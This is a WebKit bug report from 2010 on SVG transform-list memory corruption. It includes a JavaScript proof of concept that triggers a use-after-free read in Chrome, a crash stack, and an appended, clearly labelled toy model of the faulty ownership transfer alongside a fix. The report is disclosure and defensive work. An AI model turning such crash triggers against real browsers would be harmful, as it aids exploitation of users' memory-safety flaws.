[Webkit-unassigned] [Bug 49619] New: SVG Transformlist memory corruption
bugzilla-daemon at webkit.org
Tue Nov 16 13:20:58 PST 2010
https://bugs.webkit.org/show_bug.cgi?id=49619
Summary: SVG Transformlist memory corruption
Product: WebKit
Version: 528+ (Nightly build)
Platform: PC
URL: http://code.google.com/p/chromium/issues/detail?id=63380
OS/Version: Windows Vista
Status: NEW
Severity: Normal
Priority: P1
Component: SVG
AssignedTo: webkit-unassigned at lists.webkit.org
ReportedBy: skylined at chromium.org
CC: eric at webkit.org, zimmermann at kde.org,
mdelaney at apple.com
Created an attachment (id=74031)
--> (https://bugs.webkit.org/attachment.cgi?id=74031&action=review)
Repro
Does not appear to affect current stable; probably related to recent code changes in SVG. The attached repro requires running Chrome with --js-flags="--expose-gc".
Repro (run with --js-flags="--expose-gc" so that gc() is available to script):
<script>
// Create an SVG <rect> and touch its transform list property.
var oSvgRectElement = document.createElementNS("http://www.w3.org/2000/svg","rect");
oSvgRectElement.transform.c;
oSvgRectElement.requiredFeatures.clear();
// Force a garbage-collection pass before taking an item out of the rect's list.
gc();
var oSVGTransForm1 = oSvgRectElement.transform.baseVal.getItem(0);
// Move that item into a second element's transform list.
var oSVGPatternElement = document.createElementNS("http://www.w3.org/2000/svg", "pattern");
var oSvgTransformList = oSVGPatternElement.patternTransform.baseVal;
oSvgTransformList.consolidate();
oSvgTransformList.appendItem(oSVGTransForm1);
// Crashes here, in initialize() -> processIncomingListItemWrapper -> removeItemFromList.
oSvgTransformList.initialize(oSVGTransForm1);
</script>
id: chrome.dll!WTF::VectorMover<...>::move ReadAV at Arbitrary (7ba9b70f1d27059ffca122caee553043)
description: Security: Attempt to read from unallocated arbitrary memory @ 0x05C04000 in chrome.dll!WTF::VectorMover<...>::move
note: Based on this information, this is expected to be a security issue!
stack: chrome.dll!WTF::VectorMover<...>::move
chrome.dll!WTF::VectorMover<...>::moveOverlapping
chrome.dll!WebCore::SVGListPropertyTearOff<...>::removeItemFromList
chrome.dll!WebCore::SVGAnimatedListPropertyTearOff<...>::removeItemFromList
chrome.dll!WebCore::SVGListPropertyTearOff<...>::processIncomingListItemWrapper
chrome.dll!WebCore::SVGListProperty<...>::initializeValuesAndWrappers
chrome.dll!WebCore::SVGListPropertyTearOff<...>::initialize
chrome.dll!WebCore::SVGTransformListInternal::initializeCallback
chrome.dll!v8::internal::HandleApiCallHelper<...>
chrome.dll!v8::internal::Builtin_HandleApiCall
chrome.dll!v8::internal::Invoke
chrome.dll!v8::internal::Execution::Call
...
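The following is an added illustration, not code from the bug report or from WebKit. It is a toy JavaScript model of the ownership transfer the crash stack above passes through (initialize -> processIncomingListItemWrapper -> removeItemFromList): SVG 1.1 requires that inserting an item which already belongs to another list first removes it from that list, and the model shows what happens when the old list's storage is already gone, next to a hardened variant that detaches surviving wrappers when their list is destroyed. All class and function names below are hypothetical, and the scenario models only the ownership step, not the exact object lifetimes of the repro.

```javascript
'use strict';

// Added illustration, not code from the bug report or from WebKit: a toy model
// of the ownership transfer the crash stack goes through
// (initialize -> processIncomingListItemWrapper -> removeItemFromList).
// SVG 1.1 says that inserting an item that already belongs to another list
// first removes it from that list; the model shows what happens when the old
// list's storage is already gone. All names below are hypothetical.

const FREED = Symbol('freed'); // stands in for a released backing store

class TransformWrapper {
  constructor(value) {
    this.value = value;
    this.owner = null; // the list this wrapper currently belongs to, if any
  }
}

class TransformList {
  // detachOnDestroy: hardened behaviour, clear the owner pointers of surviving
  // wrappers when the list goes away instead of leaving them dangling.
  constructor(name, { detachOnDestroy = false } = {}) {
    this.name = name;
    this.detachOnDestroy = detachOnDestroy;
    this.values = [];   // backing store (a WTF::Vector in WebKit)
    this.wrappers = []; // script-visible wrappers, parallel to values
  }

  // Models the owning element being garbage-collected while script still
  // holds one of its item wrappers.
  destroy() {
    if (this.detachOnDestroy) {
      for (const w of this.wrappers) w.owner = null;
    }
    this.values = FREED;
    this.wrappers = FREED;
  }

  // Step the SVG DOM requires before insertion: pull the item out of the list
  // it currently belongs to.
  processIncoming(wrapper) {
    const old = wrapper.owner;
    if (old && old !== this) old.removeItemFromList(wrapper);
  }

  removeItemFromList(wrapper) {
    if (this.values === FREED) {
      // In the model this is an exception; in the native code it is a read
      // from memory that has already been released.
      throw new Error('use-after-free: ' + this.name + ' storage is gone');
    }
    const i = this.wrappers.indexOf(wrapper);
    if (i !== -1) {
      this.values.splice(i, 1);   // the element shift done by moveOverlapping
      this.wrappers.splice(i, 1);
    }
    wrapper.owner = null;
  }

  appendItem(wrapper) {
    this.processIncoming(wrapper);
    wrapper.owner = this;
    this.values.push(wrapper.value);
    this.wrappers.push(wrapper);
    return wrapper;
  }

  initialize(wrapper) {
    this.processIncoming(wrapper);
    this.values = [];
    this.wrappers = [];
    return this.appendItem(wrapper);
  }

  get numberOfItems() {
    return this.values === FREED ? 0 : this.values.length;
  }
}

// Scenario modelled on the repro: take an item from one element's list, let
// that element go away, then move the item into another element's list.
function runScenario(hardened) {
  const rectList = new TransformList('rect.transform.baseVal', { detachOnDestroy: hardened });
  const item = rectList.appendItem(new TransformWrapper('translate(10 20)')); // constructed sample item
  rectList.destroy(); // models gc() collecting the rect while `item` survives

  const patternList = new TransformList('pattern.patternTransform.baseVal');
  try {
    patternList.initialize(item);
    return { outcome: 'ok', items: patternList.numberOfItems };
  } catch (e) {
    return { outcome: e.message, items: patternList.numberOfItems };
  }
}

console.log(runScenario(false)); // unsafe model: dangling owner is dereferenced
console.log(runScenario(true));  // hardened model: owner was cleared on destroy
```

The unsafe path fails inside removeItemFromList on the destroyed list, which is the same frame the native stack above reports; the hardened path never reaches it because the wrapper no longer claims an owner once that owner is gone.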